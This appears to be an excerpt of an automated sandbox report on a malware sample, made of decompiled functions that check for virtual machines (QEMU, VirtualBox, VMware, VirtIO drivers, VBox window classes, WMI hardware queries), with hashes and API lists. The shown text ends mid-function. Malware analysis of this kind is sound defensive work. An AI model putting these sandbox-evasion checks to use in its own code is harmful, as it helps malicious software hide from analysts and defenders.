                                        				_t40 = L"QEMU";
                                        				_v568 = _t40;
                                        				_v576 = L"Identifier";
                                        				_t49 =  &_v584;
                                        				_v544 = _t40;
                                        				_v560 = L"HARDWARE\\Description\\System";
                                        				_v552 = L"SystemBiosVersion";
                                        				r8d = 0x200;
                                        				E0000021E21EF310E410(_t23, 0, _t26, _t27,  &_v536, _t45, _t47, _t55);
                                        				0xf301e130();
                                        				_t20 = E0000021E21EF3020EE0(_v584,  *((intOrPtr*)( &_v584 + 8)),  *((intOrPtr*)(_t49 + 0x10))); // executed
                                        				if (_t20 != 0) goto 0xf301fd0e;
                                        				if (__rbx + 1 - 2 < 0) goto 0xf301fcc0;
                                        				goto 0xf301fd13;
                                        				E0000021E21EF310C290();
                                        				return 1;
                                        			}

                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Checking reg key %s $HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0$HARDWARE\Description\System$Identifier$QEMU$SystemBiosVersion
                                        C-Code - Quality: 44%
                                        			E0000021E21EF301DCE2(signed int __edi, signed int __ebp, long long __rax, void* _a32, void* _a48, void* _a56, void* _a64) {
                                        				_Unknown_base(*)()* _t57;
                                        				void* _t58;
                                        				void* _t59;
                                        				void* _t60;
                                        				void* _t61;
                                        				void* _t62;
                                        				void* _t63;
                                        				void* _t66;
                                        				void* _t67;
                                        				void* _t68;
                                        				void* _t69;
                                        				void* _t70;
                                        				void* _t71;
                                        				void* _t72;
                                        				void* _t73;
                                        				void* _t74;
                                        				void* _t75;
                                        				void* _t76;
                                        				void* _t77;
                                        				void* _t78;
                                        				void* _t79;
                                        				void* _t80;
                                        				void* _t82;
                                        				void* _t83;
                                        				void* _t84;
                                        				void* _t85;
                                        				void* _t86;
                                        				void* _t87;
                                        				void* _t88;
                                        				signed int _t90;
                                        				signed int _t99;
                                        				signed int _t159;
                                        				signed int _t161;
                                        				signed int _t167;
                                        				void* _t191;
                                        				long long _t192;
                                        				_Unknown_base(*)()* _t193;
                                        				void* _t197;
                                        				void* _t212;
                                        				void* _t213;
                                        				void* _t218;
                                        				void* _t221;
                                        				void* _t223;
                                        				void* _t224;
                                        				void* _t225;
                                        				long long _t229;
                                        				signed int _t230;
                                        				signed long long _t239;
                                        				long long _t241;
                                        				long long _t243;
                                        				void* _t247;
                                        				void* _t248;
                                        				void* _t249;
                                        				void* _t250;
                                        
                                        				_t229 = __rax;
                                        				_t161 = __edi;
                                        				goto 0xf301dcfe;
                                        				_t57 = GetProcAddress(??, ??);
                                        				_t192 = __rax;
                                        				0xf3020190(); // executed
                                        				_t193 = _t57;
                                        				sil = _t193 == 0;
                                        				if (_t193 == 0) goto 0xf301df24; // executed
                                        				_t58 = E0000021E21EF301E190(_t159, _t230, _t239, _t241); // executed
                                        				_t59 = E0000021E21EF301E2E0(_t230, _t241); // executed
                                        				_t99 = (__edi & 0xffffff00 | _t58 == 0x00000000) & __edi & ((__edi & 0xffffff00 | _t192 != 0x00000000) ^ 0x00000001) & __ebp & (__edi & 0xffffff00 | _t59 == 0x00000000); // executed
                                        				_t60 = E0000021E21EF301E430(_t230, _t239, _t241); // executed
                                        				_t61 = E0000021E21EF301E6A0(_t247); // executed
                                        				_t197 = _t61;
                                        				bpl = _t197 == 0;
                                        				if (_t197 == 0) goto 0xf301df24;
                                        				_t62 = E0000021E21EF3020FD0(_t229, _t230, 0xf31b7ff8, _t241); // executed
                                        				sil = _t62 == 0;
                                        				_t63 = E0000021E21EF301E7D0(_t230, _t241, _t243, _t247); // executed
                                        				_t167 = _t161 & _t161 & _t99 & (_t161 & 0xffffff00 | _t60 == 0x00000000) & (_t161 & 0xffffff00 | _t63 == 0x00000000);
                                        				FindWindowW(??, ??); // executed
                                        				_t231 = _t229; // executed
                                        				FindWindowW(??, ??); // executed
                                        				if (_t229 != 0) goto 0xf301dda8;
                                        				if (_t229 == 0) goto 0xf301ddad;
                                        				_t66 = E0000021E21EF301E8F0(); // executed
                                        				_t67 = E0000021E21EF301E990(_t231); // executed
                                        				_t68 = E0000021E21EF301EA40(0, _t229, _t239, _t241, _t248, _t249); // executed
                                        				_t69 = E0000021E21EF301EC20(0, _t231, _t239, _t241, _t249); // executed
                                        				0xf301ef30();
                                        				_t70 = E0000021E21EF301EFD0(_t69, _t229);
                                        				_t71 = E0000021E21EF301F520(0, _t229, _t231, _t241, _t249, _t250); // executed
                                        				_t72 = E0000021E21EF301F730(0, _t229, _t239, _t241, _t248, _t249); // executed
                                        				_t73 = E0000021E21EF301F120(0, _t229, _t239, _t241, _t248, _t249); // executed
                                        				_t74 = E0000021E21EF301F300(0, _t229, _t231, _t241, _t249); // executed
                                        				_t75 = E0000021E21EF301F9C0(0, _t229, _t239, _t241, _t248, _t249); // executed
                                        				_t212 = _t75;
                                        				if (_t212 == 0) goto 0xf301df24; // executed
                                        				_t76 = E0000021E21EF3020C70(_t231); // executed
                                        				_t213 = _t76;
                                        				sil = _t213 == 0;
                                        				if (_t213 == 0) goto 0xf301df24; // executed
                                        				_t77 = E0000021E21EF301FC50(_t231, _t241); // executed
                                        				_t78 = E0000021E21EF301FD40(_t231); // executed
                                        				_t79 = E0000021E21EF301FE00(_t231, _t241, _t243, _t247); // executed
                                        				_t80 = E0000021E21EF3020070(_t161, _t191, _t229); // executed
                                        				_t218 = E0000021E21EF301FFE0(_t229, _t231, _t241);
                                        				sil = _t218 == 0;
                                        				if (_t218 == 0) goto 0xf301df24;
                                        				_t82 = E0000021E21EF3020250(_t231, _t241);
                                        				_t83 = E0000021E21EF3020370(_t231, _t239, _t241); // executed
                                        				_t84 = E0000021E21EF3020590(_t247); // executed
                                        				_t221 = _t84;
                                        				sil = _t221 == 0;
                                        				if (_t221 == 0) goto 0xf301df24; // executed
                                        				_t85 = E0000021E21EF3020BC0(_t231); // executed
                                        				_t86 = E0000021E21EF3020FD0(_t229, _t231, 0xf31b8f18, _t241); // executed
                                        				_t223 = _t86;
                                        				sil = _t223 == 0;
                                        				if (_t223 == 0) goto 0xf301df24; // executed
                                        				_t87 = E0000021E21EF30209C0(0, _t229, _t239, _t241, _t249); // executed
                                        				_t224 = _t87;
                                        				if (_t224 == 0) goto 0xf301df24; // executed
                                        				_t88 = E0000021E21EF3020770(); // executed
                                        				_t225 = _t88;
                                        				sil = _t225 == 0;
                                        				if (_t225 != 0) goto 0xf301df28;
                                        				goto 0xf301df38; // executed
                                        				_t90 = E0000021E21EF3020950(); // executed
                                        				dil = _t90 == 0;
                                        				return _t90 & 0xffffff00 | (_t161 & (_t161 & 0xffffff00 | _t224 == 0x00000000) & _t161 & (_t161 & 0xffffff00 | _t85 == 0x00000000) & _t161 & (_t161 & 0xffffff00 | _t82 == 0x00000000) & _t161 & (_t161 & 0xffffff00 | _t77 == 0x00000000) & _t161 & (_t161 & 0xffffff00 | _t212 == 0x00000000) & _t167 & (_t161 & 0xffffff00 | _t66 == 0x00000000) & 0 & (_t161 & 0xffffff00 | _t67 == 0x00000000) & (_t161 & 0xffffff00 | _t68 == 0x00000000) & (_t161 & 0xffffff00 | _t69 == 0x00000000) & (_t161 & 0xffffff00 | _t69 == 0x00000000) & (_t161 & 0xffffff00 | _t70 == 0x00000000) & (_t161 & 0xffffff00 | _t71 == 0x00000000) & (_t161 & 0xffffff00 | _t72 == 0x00000000) & (_t161 & 0xffffff00 | _t73 == 0x00000000) & (_t161 & 0xffffff00 | _t74 == 0x00000000) & (_t161 & 0xffffff00 | _t78 == 0x00000000) & (_t161 & 0xffffff00 | _t79 == 0x00000000) & (_t161 & 0xffffff00 | _t80 == 0x00000000) & (_t161 & 0xffffff00 | _t83 == 0x00000000) & _t161) == 0x00000000;
                                        			}

                                        APIs
                                          • Part of subcall function 0000021EF301E2E0: RegOpenKeyExW.ADVAPI32 ref: 0000021EF301E3D8
                                          • Part of subcall function 0000021EF301E430: GetWindowsDirectoryW.KERNEL32 ref: 0000021EF301E55D
                                          • Part of subcall function 0000021EF301E430: Wow64DisableWow64FsRedirection.KERNEL32 ref: 0000021EF301E571
                                          • Part of subcall function 0000021EF301E430: PathCombineW.SHLWAPI ref: 0000021EF301E590
                                          • Part of subcall function 0000021EF301E430: GetFileAttributesW.KERNEL32 ref: 0000021EF301E5CA
                                          • Part of subcall function 0000021EF301E6A0: ExpandEnvironmentStringsW.KERNEL32 ref: 0000021EF301E744
                                          • Part of subcall function 0000021EF301E6A0: PathCombineW.SHLWAPI ref: 0000021EF301E770
                                          • Part of subcall function 0000021EF301E6A0: GetFileAttributesW.KERNEL32 ref: 0000021EF301E77E
                                          • Part of subcall function 0000021EF3020FD0: GetProcessHeap.KERNEL32 ref: 0000021EF3020FEC
                                          • Part of subcall function 0000021EF3020FD0: HeapAlloc.KERNEL32 ref: 0000021EF3020FFD
                                          • Part of subcall function 0000021EF301E7D0: CreateFileW.KERNEL32 ref: 0000021EF301E869
                                        • FindWindowW.USER32 ref: 0000021EF301DD84
                                        • FindWindowW.USER32 ref: 0000021EF301DD96
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$AttributesCombineFindHeapPathWindowWow64$AllocCreateDirectoryDisableEnvironmentExpandOpenProcessRedirectionStringsWindows
                                        • String ID: VBoxTrayToolWnd$VBoxTrayToolWndClass
                                        • API String ID: 3985774531-1325860762
                                        • Opcode ID: 656fc6a3ee9c4863f444f8d17b3f53e055efe4c207eb10f7ce8fd6d05fe868f6
                                        • Instruction ID: 19f746e7369513083a33d8ba544f78037169c8c0f27c6cc63cb6c299cf1412bd
                                        • Opcode Fuzzy Hash: 656fc6a3ee9c4863f444f8d17b3f53e055efe4c207eb10f7ce8fd6d05fe868f6
                                        • Instruction Fuzzy Hash: 1021CF73712B0002FE2437354D897DF02966BA4780F0F062AAD0997ACBEE5DC803C390
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 43%
                                        			E0000021E21EF301FD40(signed int __rbx, long long _a8) {
                                        				signed long long _v24;
                                        				char _v536;
                                        				long long _v552;
                                        				long long _v560;
                                        				long long _v568;
                                        				void* __rdi;
                                        				void* _t14;
                                        				void* _t17;
                                        				void* _t20;
                                        				void* _t21;
                                        				signed long long _t25;
                                        				signed int _t30;
                                        				void* _t38;
                                        				void* _t39;
                                        				void* _t41;
                                        				void* _t44;
                                        
                                        				_t30 = __rbx;
                                        				_a8 = __rbx;
                                        				_t42 = _t41 - 0x250;
                                        				_t25 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_v24 = _t25 ^ _t41 - 0x00000250;
                                        				_v568 = L"qemu-ga.exe";
                                        				_v560 = L"vdagent.exe";
                                        				_v552 = L"vdservice.exe";
                                        				asm("o16 nop [eax+eax]");
                                        				r8d = 0x200;
                                        				E0000021E21EF310E410(_t17, 0, _t20, _t21,  &_v536, _t38, _t39, _t44);
                                        				0xf301e130();
                                        				_t14 = E0000021E21EF30210E0(_t20, _t21, __rbx,  *((intOrPtr*)(_t42 + 0x20 + __rbx * 8))); // executed
                                        				if (_t14 != 0) goto 0xf301fdd7;
                                        				if (_t30 + 1 - 3 < 0) goto 0xf301fd90;
                                        				goto 0xf301fddc;
                                        				E0000021E21EF310C290();
                                        				return 1;
                                        			}

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                        • String ID: Checking qemu processes %s $qemu-ga.exe$vdagent.exe$vdservice.exe
                                        • API String ID: 1083639309-928502638
                                        • Opcode ID: c46f65550f94676cef748d7a804a694c43e45b552491a80b33a601f36fb83de6
                                        • Instruction ID: 5a0051b9f0b67002cc10784be9c0f54170cec8d192d934abdea6fafbeeb65ddb
                                        • Opcode Fuzzy Hash: c46f65550f94676cef748d7a804a694c43e45b552491a80b33a601f36fb83de6
                                        • Instruction Fuzzy Hash: 67111B35218A8481EF20AB51F8883EB73A1FBA9788F565122DE8D47F96DA3CC146C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 50%
                                        			E0000021E21EF301E990(signed int __rbx, long long _a8) {
                                        				signed long long _v24;
                                        				char _v536;
                                        				long long _v544;
                                        				long long _v552;
                                        				void* __rdi;
                                        				void* _t13;
                                        				void* _t16;
                                        				void* _t19;
                                        				void* _t20;
                                        				signed long long _t24;
                                        				signed int _t28;
                                        				void* _t36;
                                        				void* _t37;
                                        				void* _t39;
                                        				void* _t42;
                                        
                                        				_t28 = __rbx;
                                        				_a8 = __rbx;
                                        				_t40 = _t39 - 0x240;
                                        				_t24 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_v24 = _t24 ^ _t39 - 0x00000240;
                                        				_v552 = L"vboxservice.exe";
                                        				_v544 = L"vboxtray.exe";
                                        				r8d = 0x200;
                                        				E0000021E21EF310E410(_t16, 0, _t19, _t20,  &_v536, _t36, _t37, _t42);
                                        				0xf301e130();
                                        				_t13 = E0000021E21EF30210E0(_t19, _t20, __rbx,  *((intOrPtr*)(_t40 + 0x20 + __rbx * 8))); // executed
                                        				if (_t13 != 0) goto 0xf301ea17;
                                        				if (_t28 + 1 - 2 < 0) goto 0xf301e9d0;
                                        				goto 0xf301ea1c;
                                        				E0000021E21EF310C290();
                                        				return 1;
                                        			}

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                        • String ID: Checking VirtualBox process %s $vboxservice.exe$vboxtray.exe
                                        • API String ID: 1083639309-2201811630
                                        • Opcode ID: a0d76824915bb146bc2543c919e3cf64f271d57e02c2de59f93926973ead6723
                                        • Instruction ID: da1436ed03d1ed1cb474d8cffa3622374b806a954b3711b1abda197982a15319
                                        • Opcode Fuzzy Hash: a0d76824915bb146bc2543c919e3cf64f271d57e02c2de59f93926973ead6723
                                        • Instruction Fuzzy Hash: CF015E35214A8081FF20AB51F8993DB73A0F7A8788F865122DE8D47F96DA3CC146CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 26%
                                        			E0000021E21EF301F300(void* __edx, void* __rax, long long __rbx, long long __rsi, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
                                        				long long _v24;
                                        				long long _v32;
                                        				long long _v40;
                                        				intOrPtr _v56;
                                        				signed short _v64;
                                        				void* _v72;
                                        				long long _v80;
                                        				long long _v88;
                                        				void* _t53;
                                        				void* _t54;
                                        				signed char _t60;
                                        				intOrPtr _t98;
                                        				intOrPtr* _t114;
                                        				long long _t134;
                                        				long long _t135;
                                        				void* _t146;
                                        
                                        				_t135 = __rsi;
                                        				_a24 = _t134;
                                        				_v72 = _t134;
                                        				_a16 = _t134;
                                        				_t54 = E0000021E21EF30211C0(_t53,  &_a24,  &_v72, __rsi); // executed
                                        				if (_t54 == 0) goto 0xf301f50b;
                                        				_v24 = __rbx;
                                        				_v32 = _t135;
                                        				_v40 = __r14;
                                        				__imp__#2();
                                        				__imp__#2();
                                        				_t9 = _t134 + 1; // 0x1
                                        				r14d = _t9;
                                        				_t104 = __rax;
                                        				if (__rax == 0) goto 0xf301f3ba;
                                        				if (__rax == 0) goto 0xf301f3b1;
                                        				_v80 =  &_a16;
                                        				_t13 = _t134 + 0x30; // 0x30
                                        				r9d = _t13;
                                        				_v88 = _t134;
                                        				_t145 =  *_a24;
                                        				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0xf301f3b1;
                                        				r14d = 0;
                                        				 *((intOrPtr*)( *_a24 + 0x10))();
                                        				 *((intOrPtr*)( *_v72 + 0x10))();
                                        				__imp__CoUninitialize();
                                        				__imp__#6();
                                        				_t137 = _v32;
                                        				if (__rax == 0) goto 0xf301f3cd;
                                        				__imp__#6();
                                        				if (r14d == 0) goto 0xf301f4fd;
                                        				_t114 = _a16;
                                        				_a32 = _t134;
                                        				_a8 = 0;
                                        				if (_t114 == 0) goto 0xf301f4d6;
                                        				asm("o16 nop [eax+eax]");
                                        				_v88 =  &_a8;
                                        				r8d = 1; // executed
                                        				 *((intOrPtr*)( *_t114 + 0x20))();
                                        				if (_a8 == 0) goto 0xf301f4d2;
                                        				_v80 = _t134;
                                        				r8d = 0;
                                        				_v88 = _t134;
                                        				_t98 =  *_a32; // executed
                                        				if ( *((intOrPtr*)(_t98 + 0x20))() < 0) goto 0xf301f4b9;
                                        				_t60 = _v64 & 0x0000ffff;
                                        				if (_t60 == 1) goto 0xf301f4b9;
                                        				if ((_t60 & 0x00000008) == 0) goto 0xf301f4af;
                                        				E0000021E21EF310E5B0(__rax, _v56, L"82801FB", _v32,  *_a24, _t146);
                                        				if (_t98 != 0) goto 0xf301f4ad;
                                        				E0000021E21EF310E5B0(_t104, _v56, L"82441FX", _v32, _t145, _t146);
                                        				if (_t98 != 0) goto 0xf301f4ad;
                                        				E0000021E21EF310E5B0(_t104, _v56, L"82371SB", _v32, _t145, _t146);
                                        				if (_t98 != 0) goto 0xf301f4ad;
                                        				E0000021E21EF310E5B0(_t104, _v56, L"OpenHCD", _t137, _t145, _t146);
                                        				if (_t98 == 0) goto 0xf301f4af;
                                        				__imp__#9();
                                        				 *((intOrPtr*)( *_a32 + 0x10))();
                                        				if (_a16 != 0) goto 0xf301f400;
                                        				goto 0xf301f4d6;
                                        				 *((intOrPtr*)( *_a16 + 0x10))();
                                        				 *((intOrPtr*)( *_a24 + 0x10))();
                                        				 *((intOrPtr*)( *_v72 + 0x10))();
                                        				__imp__CoUninitialize(); // executed
                                        				dil = 1 - 3 >= 0;
                                        				return 0;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Similarity
                                        • API ID: Stringwcsstr$AllocFreeUninitialize$ClearInitializeVariant
                                        • String ID: 82371SB$82441FX$82801FB$Name$OpenHCD$SELECT * FROM Win32_PnPEntity$WQL
                                        • API String ID: 1414631806-1350769890
                                        • Opcode ID: 035f43342f219f88fd52ced9a7fa007bc81059b4f8d4b92e025064900970dabd
                                        • Instruction ID: 91bca5e073f58f0037d586fae5dee4329411e43118e462c09fcf9ebeb675475f
                                        • Opcode Fuzzy Hash: 035f43342f219f88fd52ced9a7fa007bc81059b4f8d4b92e025064900970dabd
                                        • Instruction Fuzzy Hash: 97613836300A4086EF109F25E8586DE77B4FBA8B98F464112EE4E43FA9EF38C456C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Similarity
                                        • API ID: String$AllocClearFreeUninitializeVariant$Initialize
                                        • String ID: HVM domU$Model$SELECT * FROM Win32_ComputerSystem$VMWare$VirtualBox$WQL
                                        • API String ID: 4173814494-4167877488
                                        • Opcode ID: 4433f5f65cde9349464ff77a51c12a1dd7467128e0f45f9a499b30ed3468992d
                                        • Instruction ID: f997f6bcf177ccc50284548d3669aa62adff401b50e40f75ea60d7db736a4313
                                        • Opcode Fuzzy Hash: 4433f5f65cde9349464ff77a51c12a1dd7467128e0f45f9a499b30ed3468992d
                                        • Instruction Fuzzy Hash: D151F536201B9186EF218F25E89869E77B0F798F98F465116EE4E43F68DF38C45AC340
                                        Uniqueness

                                        Uniqueness Score: -1.00%


                                        C-Code - Quality: 42%
                                        			E0000021E21EF3020370(long long __rbx, signed long long __rdi, long long __rsi) {
                                        				int _t56;
                                        				signed char _t58;
                                        				void* _t65;
                                        				void* _t73;
                                        				void* _t77;
                                        				signed long long _t90;
                                        				signed long long _t104;
                                        				void* _t125;
                                        				signed long long _t130;
                                        				WCHAR* _t135;
                                        				void* _t138;
                                        				signed long long _t139;
                                        				void* _t141;
                                        
                                        				_t130 = __rdi;
                                        				 *((long long*)(_t138 + 8)) = __rbx;
                                        				 *((long long*)(_t138 + 0x10)) = __rsi;
                                        				 *((long long*)(_t138 + 0x18)) = __rdi;
                                        				_t136 = _t138 - 0x5b0;
                                        				_t139 = _t138 - 0x6b0;
                                        				_t90 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				 *(_t138 - 0x5b0 + 0x5a0) = _t90 ^ _t139;
                                        				 *((long long*)(_t139 + 0x30)) = L"System32\\drivers\\balloon.sys";
                                        				r8d = 0x208;
                                        				 *((long long*)(_t139 + 0x38)) = L"System32\\drivers\\netkvm.sys";
                                        				 *((long long*)(_t139 + 0x40)) = L"System32\\drivers\\pvpanic.sys";
                                        				 *((long long*)(_t139 + 0x48)) = L"System32\\drivers\\viofs.sys";
                                        				 *((long long*)(_t139 + 0x50)) = L"System32\\drivers\\viogpudo.sys";
                                        				 *((long long*)(_t139 + 0x58)) = L"System32\\drivers\\vioinput.sys";
                                        				 *((long long*)(_t139 + 0x60)) = L"System32\\drivers\\viorng.sys";
                                        				 *((long long*)(_t139 + 0x68)) = L"System32\\drivers\\vioscsi.sys";
                                        				 *((long long*)(_t139 + 0x70)) = L"System32\\drivers\\vioser.sys";
                                        				 *((long long*)(_t139 + 0x78)) = L"System32\\drivers\\viostor.sys";
                                        				E0000021E21EF310E410(_t65, 0, _t73, _t77, _t138 - 0x5b0 + 0x190, _t125, __rdi, _t141);
                                        				r8d = 0x208;
                                        				E0000021E21EF310E410(_t65, 0, _t73, _t77, _t138 - 0x530, _t125, _t130, _t141);
                                        				 *(_t139 + 0x28) = _t130;
                                        				_t56 = GetWindowsDirectoryW(_t135);
                                        				0xf3020e50();
                                        				if (_t56 == 0) goto 0xf302046a;
                                        				__imp__Wow64DisableWow64FsRedirection();
                                        				_t104 = _t130;
                                        				__imp__PathCombineW();
                                        				r8d = 0x200;
                                        				E0000021E21EF310E410(_t65, 0, 0, _t77, _t136 + 0x3a0, _t136 + 0x190, _t130,  *((intOrPtr*)(_t139 + 0x30 + _t104 * 8)));
                                        				0xf301e130();
                                        				_t58 = GetFileAttributesW(??); // executed
                                        				if (_t58 == 0xffffffff) goto 0xf30204c9;
                                        				if ((_t58 & 0x00000010) == 0) goto 0xf30204d4;
                                        				if (_t104 + 1 - 0xa < 0) goto 0xf3020470;
                                        				goto 0xf30204d9;
                                        				 *((intOrPtr*)(_t139 + 0x20)) = 0;
                                        				if ( *0xf3204490 == 8) goto 0xf3020502;
                                        				if (1 - 0x1e < 0) goto 0xf30204f0;
                                        				goto 0xf3020561;
                                        				if ( *0x21EF32044E4 == dil) goto 0xf3020561;
                                        				if ( *0xf3204490 == 8) goto 0xf302052a;
                                        				if (1 - 0x1e < 0) goto 0xf3020518;
                                        				goto 0xf302053f;
                                        				if ( *((intOrPtr*)(0x21ef32044e4)) == dil) goto 0xf302053f;
                                        				GetCurrentProcess();
                                        				 *((long long*)( *0x21EF32044E8))();
                                        				if ( *((intOrPtr*)(_t139 + 0x20)) == 0) goto 0xf3020561;
                                        				__imp__Wow64RevertWow64FsRedirection();
                                        				E0000021E21EF310C290();
                                        				return 1;
                                        			}
















                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Similarity
                                        • API ID: Wow64$Redirection$AttributesCombineCurrentDirectoryDisableFilePathProcessRevertWindows
                                        • String ID: Checking file %s $System32\drivers\balloon.sys$System32\drivers\netkvm.sys$System32\drivers\pvpanic.sys$System32\drivers\viofs.sys$System32\drivers\viogpudo.sys$System32\drivers\vioinput.sys$System32\drivers\viorng.sys$System32\drivers\vioscsi.sys$System32\drivers\vioser.sys$System32\drivers\viostor.sys
                                        • API String ID: 2137468328-3181514389
                                        • Opcode ID: 5d16ff1b976b14de94503c63726e21016d550f9cc417a117d5239c3075ee5e3c
                                        • Instruction ID: c40a3077b529e846b0340306124d3a78b1c3454521d27b1429738595ecbded88
                                        • Opcode Fuzzy Hash: 5d16ff1b976b14de94503c63726e21016d550f9cc417a117d5239c3075ee5e3c
                                        • Instruction Fuzzy Hash: 46513876210B8099EF208B25EC582DB77A5F7A9B84F960126DE8D43FA8DF3CC556C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%


                                        C-Code - Quality: 16%
                                        			E0000021E21EF301F730(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14) {
                                        				void* __rbx;
                                        				void* _t74;
                                        				void* _t75;
                                        				void* _t93;
                                        				long long _t117;
                                        				long long _t119;
                                        				void* _t122;
                                        				intOrPtr* _t131;
                                        				long long _t156;
                                        				void* _t159;
                                        				void* _t160;
                                        				void* _t161;
                                        				void* _t168;
                                        				long long _t173;
                                        
                                        				_t156 = __rsi;
                                        				_t159 = _t160 - 0x47;
                                        				_t161 = _t160 - 0x90;
                                        				r15d = 0;
                                        				 *((long long*)(_t159 + 0x7f)) = _t173;
                                        				 *((long long*)(_t159 - 0x19)) = _t173;
                                        				 *((long long*)(_t159 + 0x77)) = _t173;
                                        				_t75 = E0000021E21EF30211C0(_t74, _t159 + 0x7f, _t159 - 0x19, __rsi); // executed
                                        				if (_t75 == 0) goto 0xf301f9a7;
                                        				 *((long long*)(_t161 + 0x88)) = _t156;
                                        				 *((long long*)(_t161 + 0x80)) = __rdi;
                                        				 *((long long*)(_t161 + 0x78)) = __r12;
                                        				 *((long long*)(_t161 + 0x70)) = __r14;
                                        				__imp__#2();
                                        				__imp__#2();
                                        				r12d = 1;
                                        				r14d = r12d;
                                        				if (__rax == 0) goto 0xf301f805;
                                        				if (__rax == 0) goto 0xf301f7fc;
                                        				 *((long long*)(_t161 + 0x28)) = _t159 + 0x77;
                                        				_t14 = _t173 + 0x30; // 0x30
                                        				r9d = _t14;
                                        				 *((long long*)(_t161 + 0x20)) = _t173;
                                        				_t167 =  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f))));
                                        				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0xa0))() >= 0) goto 0xf301f7fc;
                                        				r14d = r15d;
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0x10))();
                                        				_t117 =  *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x19))));
                                        				 *((intOrPtr*)(_t117 + 0x10))();
                                        				__imp__CoUninitialize();
                                        				__imp__#6();
                                        				if (__rax == 0) goto 0xf301f81b;
                                        				__imp__#6();
                                        				if (r14d == 0) goto 0xf301f994;
                                        				_t131 =  *((intOrPtr*)(_t159 + 0x77));
                                        				 *((long long*)(_t159 + 0x6f)) = _t173;
                                        				 *((intOrPtr*)(_t159 + 0x67)) = r15d;
                                        				 *(_t159 - 0x11) = r15w;
                                        				 *((long long*)(_t159 - 0xf)) = _t117;
                                        				 *((long long*)(_t159 - 7)) = _t117;
                                        				 *((intOrPtr*)(_t159 + 1)) = 0;
                                        				 *((short*)(_t159 + 5)) = 0;
                                        				if (_t131 == 0) goto 0xf301f974;
                                        				 *((long long*)(_t161 + 0x20)) = _t159 + 0x67;
                                        				r8d = r12d; // executed
                                        				 *((intOrPtr*)( *_t131 + 0x20))();
                                        				if ( *((intOrPtr*)(_t159 + 0x67)) == r15d) goto 0xf301f970;
                                        				 *((long long*)(_t161 + 0x28)) = _t173;
                                        				r8d = 0;
                                        				 *((long long*)(_t161 + 0x20)) = _t173;
                                        				_t119 =  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))); // executed
                                        				 *((intOrPtr*)(_t119 + 0x20))();
                                        				if (0 < 0) goto 0xf301f8d7;
                                        				if ( *(_t159 - 0x11) == r12w) goto 0xf301f8d7;
                                        				if (( *(_t159 - 0x11) & 0x00000008) == 0) goto 0xf301f8cd;
                                        				E0000021E21EF310E5B0(_t122,  *((intOrPtr*)(_t159 - 9)), L"VirtualBox",  *((intOrPtr*)(_t161 + 0x88)),  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))), _t168);
                                        				_t92 =  !=  ? r12d : r15d;
                                        				__imp__#9();
                                        				 *(_t159 + 7) = r15w;
                                        				 *((long long*)(_t159 + 0x11)) = _t119;
                                        				 *((long long*)(_t159 + 9)) = _t119;
                                        				r8d = 0;
                                        				asm("movups xmm0, [ebp+0x7]");
                                        				 *((intOrPtr*)(_t159 + 0x19)) = 0;
                                        				 *((short*)(_t159 + 0x1d)) = 0;
                                        				asm("movsd xmm1, [ebp+0x17]");
                                        				asm("movups [ebp-0x11], xmm0");
                                        				 *((long long*)(_t161 + 0x28)) = _t173;
